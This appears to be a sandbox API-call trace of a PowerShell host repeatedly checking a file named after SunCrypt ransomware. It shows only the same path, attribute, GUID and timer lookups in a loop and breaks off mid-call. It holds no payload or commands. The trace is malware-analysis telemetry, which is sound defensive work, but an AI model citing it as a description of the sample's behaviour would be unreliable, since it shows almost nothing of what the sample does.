CoCreateGuid (in: 
pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x47c68b1d, Data2=0x855a, Data3=0x4505, Data4=([0]=0x8b, [1]=0xaa, [2]=0xb2, [3]=0xb0, [4]=0x0, [5]=0xf, [6]=0x3a, [7]=0x90))) returned 0x0 [0104.134] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.134] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701695065655) returned 1 [0104.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.134] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.135] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.136] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701695222433) returned 1 [0104.136] EtwEventActivityIdControl () returned 0x0 [0104.136] EtwEventActivityIdControl () returned 0x0 [0104.136] EtwEventActivityIdControl () returned 0x0 [0104.136] EtwEventActivityIdControl () returned 0x0 [0104.136] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc147a069, Data2=0xb613, Data3=0x48a8, Data4=([0]=0x90, [1]=0x1c, [2]=0x2c, [3]=0x7b, [4]=0xf3, [5]=0x4c, [6]=0x30, [7]=0x96))) returned 0x0 [0104.137] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.137] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701695334625) returned 1 [0104.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.137] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.138] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701695488957) returned 1 [0104.138] EtwEventActivityIdControl () returned 0x0 [0104.138] EtwEventActivityIdControl () returned 0x0 [0104.138] EtwEventActivityIdControl () returned 0x0 [0104.139] EtwEventActivityIdControl () returned 0x0 [0104.139] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x8fe7dd9c, Data2=0xa07e, Data3=0x4fd6, Data4=([0]=0xb3, [1]=0xe1, [2]=0x4b, [3]=0x8c, [4]=0xea, [5]=0xe9, [6]=0xb2, [7]=0x5c))) returned 0x0 [0104.139] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.139] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701695599678) returned 1 [0104.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.140] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.144] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701696029553) returned 1 [0104.144] EtwEventActivityIdControl () returned 0x0 [0104.144] EtwEventActivityIdControl () returned 0x0 [0104.144] EtwEventActivityIdControl () returned 0x0 [0104.144] EtwEventActivityIdControl () returned 0x0 [0104.144] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xaa9586c3, Data2=0x9089, Data3=0x4cd6, Data4=([0]=0xa7, [1]=0x88, [2]=0x22, [3]=0xfd, [4]=0xdd, [5]=0xc5, [6]=0x39, [7]=0x5c))) returned 0x0 [0104.145] 
GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.145] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701696140864) returned 1 [0104.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.145] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a 
[0104.147] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701696380111) returned 1 [0104.147] EtwEventActivityIdControl () returned 0x0 [0104.147] EtwEventActivityIdControl () returned 0x0 [0104.147] EtwEventActivityIdControl () returned 0x0 [0104.147] EtwEventActivityIdControl () returned 0x0 [0104.148] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x40d40333, Data2=0xfc3e, Data3=0x4c31, Data4=([0]=0xbd, [1]=0xf8, [2]=0x76, [3]=0x50, [4]=0xac, [5]=0x13, [6]=0xdd, [7]=0xc0))) returned 0x0 [0104.148] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.148] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701696481059) returned 1 [0104.148] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.148] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.148] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) 
returned 1 [0104.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.149] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.149] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.150] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701696707080) returned 1 [0104.151] EtwEventActivityIdControl () returned 0x0 [0104.151] EtwEventActivityIdControl () returned 0x0 [0104.151] EtwEventActivityIdControl () returned 0x0 [0104.151] EtwEventActivityIdControl () returned 0x0 [0104.151] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7bf0d212, Data2=0x204b, Data3=0x4eeb, Data4=([0]=0x8b, [1]=0x89, [2]=0x77, [3]=0x88, [4]=0x80, [5]=0x5e, [6]=0x71, [7]=0x5b))) returned 0x0 [0104.151] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.152] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701696820743) returned 1 [0104.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.152] 
GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.156] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701697311058) returned 1 [0104.157] EtwEventActivityIdControl () returned 0x0 [0104.157] EtwEventActivityIdControl () returned 0x0 [0104.157] EtwEventActivityIdControl () returned 0x0 [0104.157] EtwEventActivityIdControl () returned 0x0 [0104.157] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x15327e36, Data2=0x254e, Data3=0x4af6, Data4=([0]=0xb7, [1]=0xab, [2]=0x44, [3]=0xdc, [4]=0xf, [5]=0x73, [6]=0xd, [7]=0x31))) returned 0x0 [0104.157] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.158] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701697439764) returned 1 
[0104.158] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.158] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.158] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.158] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.158] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.162] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701697907964) returned 1 [0104.163] EtwEventActivityIdControl () returned 0x0 [0104.163] EtwEventActivityIdControl () returned 0x0 [0104.163] 
EtwEventActivityIdControl () returned 0x0 [0104.163] EtwEventActivityIdControl () returned 0x0 [0104.163] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xe16115f0, Data2=0xf22c, Data3=0x4463, Data4=([0]=0x82, [1]=0x9d, [2]=0xd1, [3]=0x45, [4]=0xb6, [5]=0xa, [6]=0xd4, [7]=0xe3))) returned 0x0 [0104.164] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.164] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701698046496) returned 1 [0104.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.164] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: 
lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.169] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701698565698) returned 1 [0104.169] EtwEventActivityIdControl () returned 0x0 [0104.169] EtwEventActivityIdControl () returned 0x0 [0104.169] EtwEventActivityIdControl () returned 0x0 [0104.170] EtwEventActivityIdControl () returned 0x0 [0104.170] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x4e1c020, Data2=0x9d30, Data3=0x4d5b, Data4=([0]=0xa8, [1]=0x30, [2]=0x3a, [3]=0x10, [4]=0xf1, [5]=0xbc, [6]=0x90, [7]=0x4b))) returned 0x0 [0104.170] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.170] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701698706165) returned 1 [0104.171] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.171] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.171] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.171] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: 
lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.171] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.171] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.172] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701698907978) returned 1 [0104.173] EtwEventActivityIdControl () returned 0x0 [0104.173] EtwEventActivityIdControl () returned 0x0 [0104.173] EtwEventActivityIdControl () returned 0x0 [0104.173] EtwEventActivityIdControl () returned 0x0 [0104.173] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xfc6e9e3a, Data2=0xf28a, Data3=0x4685, Data4=([0]=0xa5, [1]=0x4a, [2]=0x4a, [3]=0x36, [4]=0x4c, [5]=0x57, [6]=0x7f, [7]=0x5))) returned 0x0 [0104.174] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.174] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701699758101) returned 1 [0104.182] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, 